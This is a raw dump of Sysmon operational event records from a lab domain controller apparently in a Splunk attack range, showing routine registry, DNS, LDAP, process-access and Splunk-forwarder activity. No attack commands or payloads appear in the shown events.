13241300x80000000000000002201726Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:11.388{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{B3898C47-28D2-4A71-8BC8-47680EE6B398}\PrimaryDomainNameattackrange.local 13241300x80000000000000002201725Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:11.388{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{B3898C47-28D2-4A71-8BC8-47680EE6B398}\AdapterDomainName(Empty) 13241300x80000000000000002201724Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:11.388{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{B3898C47-28D2-4A71-8BC8-47680EE6B398}\Hostnamewin-dc-228 10341000x80000000000000002201723Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:11.388{5ABCFE62-842D-603E-0B00-00000000AD01}6324216C:\Windows\system32\lsass.exe{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x80000000000000002201722Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:11.388{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{B3898C47-28D2-4A71-8BC8-47680EE6B398}\RegisteredSinceBootDWORD (0x00000001) 23542300x80000000000000002201744Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:12.635{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09500A5A3A7D6F8C79E71E7002DCD946,SHA256=697A1BBEC86D59149ABEE75D0F7A348AE2F1F134185D66A6EBC13C6C1BEB3EDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201743Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:12.620{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A4BBC0F605D1EA6CD2796466C1D7D0CD,SHA256=1C1EF671DC069EDEE87D3E129D7C20E219A898B12DCD335212C112B9DC3B2112,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000002201770Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:13.698{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000002201769Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:13.698{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0955ca22) 13241300x80000000000000002201768Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:13.698{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d710f6-0x5088280c) 13241300x80000000000000002201767Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:13.698{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d710fe-0xb24c900c) 13241300x80000000000000002201766Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:13.698{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d71107-0x1410f80c) 13241300x80000000000000002201765Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:13.698{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000002201764Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:13.698{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0955ca22) 13241300x80000000000000002201763Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:13.698{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d710f6-0x5088280c) 13241300x80000000000000002201762Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:13.698{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d710fe-0xb24c900c) 13241300x80000000000000002201761Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:00:13.698{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d71107-0x1410f80c) 23542300x80000000000000002201760Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:13.651{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A75A0D7E36E34F9C1570568AB7FD42C,SHA256=29AC50A11F71CA3A7198E64CE277D694292D869972693E7867BC96489D3BED6F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201759Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:09.396{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local54160- 354300x80000000000000002201758Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:09.236{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-228.attackrange.local53280-false10.0.1.14win-dc-228.attackrange.local53domain 354300x80000000000000002201757Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:09.236{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruea00:10e:0:0:9820:3fb3:1e2:ffff-53280-truea00:10e:0:0:0:0:0:0win-dc-228.attackrange.local53domain 354300x80000000000000002201756Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:09.235{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local61716- 354300x80000000000000002201755Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:09.235{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local61991- 354300x80000000000000002201754Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:09.235{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local61991-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domain 354300x80000000000000002201753Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:09.235{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local54381- 354300x80000000000000002201752Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:09.231{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60578-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002201751Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:09.231{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60578-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002201750Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:09.229{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-228.attackrange.local60577-false10.0.1.14win-dc-228.attackrange.local53domain 354300x80000000000000002201749Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:09.229{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-228.attackrange.local60577-false10.0.1.14win-dc-228.attackrange.local53domain 354300x80000000000000002201748Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:09.227{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-228.attackrange.local53domainfalse10.0.1.14win-dc-228.attackrange.local64075- 354300x80000000000000002201747Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:09.227{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruefalse10.0.1.14win-dc-228.attackrange.local64075-false10.0.1.14win-dc-228.attackrange.local53domain 354300x80000000000000002201746Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:09.227{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55532- 354300x80000000000000002201745Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:09.053{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55241-false10.0.1.12-8000- 23542300x80000000000000002201772Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:14.685{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=057F527F69220B6E9751BA7BD147E0DD,SHA256=D4D0609330BC38CA3A76F55846CD9D248106E1B1BFA9878D3E90E9169D979700,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201771Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:10.409{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-54160- 23542300x80000000000000002201773Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:15.763{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F5E93EFB8F38427D9130B76353D8410,SHA256=D02B1B9B8B241C655FE42B4841BE1D5FABC55351495F5A898B280B571B674C1B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201785Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:17.685{5ABCFE62-E7F1-6040-0C4E-00000000AD01}22046368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201784Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:17.560{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E7F1-6040-0C4E-00000000AD01}2204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201783Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:17.560{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201782Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:17.560{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201781Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:17.560{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201780Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:17.560{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201779Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:17.560{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E7F1-6040-0C4E-00000000AD01}2204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201778Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:17.560{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E7F1-6040-0C4E-00000000AD01}2204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201777Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:17.561{5ABCFE62-E7F1-6040-0C4E-00000000AD01}2204C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002201776Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:14.068{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60579-false10.0.1.12-8000- 23542300x80000000000000002201775Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:17.279{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=985F390CBFC2152173FCECE0D4D70344,SHA256=9902E956C17D36439E12AB2F9965EEF6BC23579783ABFC0901864546BBFEEB86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201774Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:16.998{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BE1B0F7B31112E8F5B0BAEE233CC2E3,SHA256=16607FB811D96C09DFE3EFC271E60139C1D77A659A492481053DB0D9F5AA87A7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201804Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:18.904{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E7F2-6040-0E4E-00000000AD01}5164C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201803Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:18.904{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201802Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:18.904{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201801Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 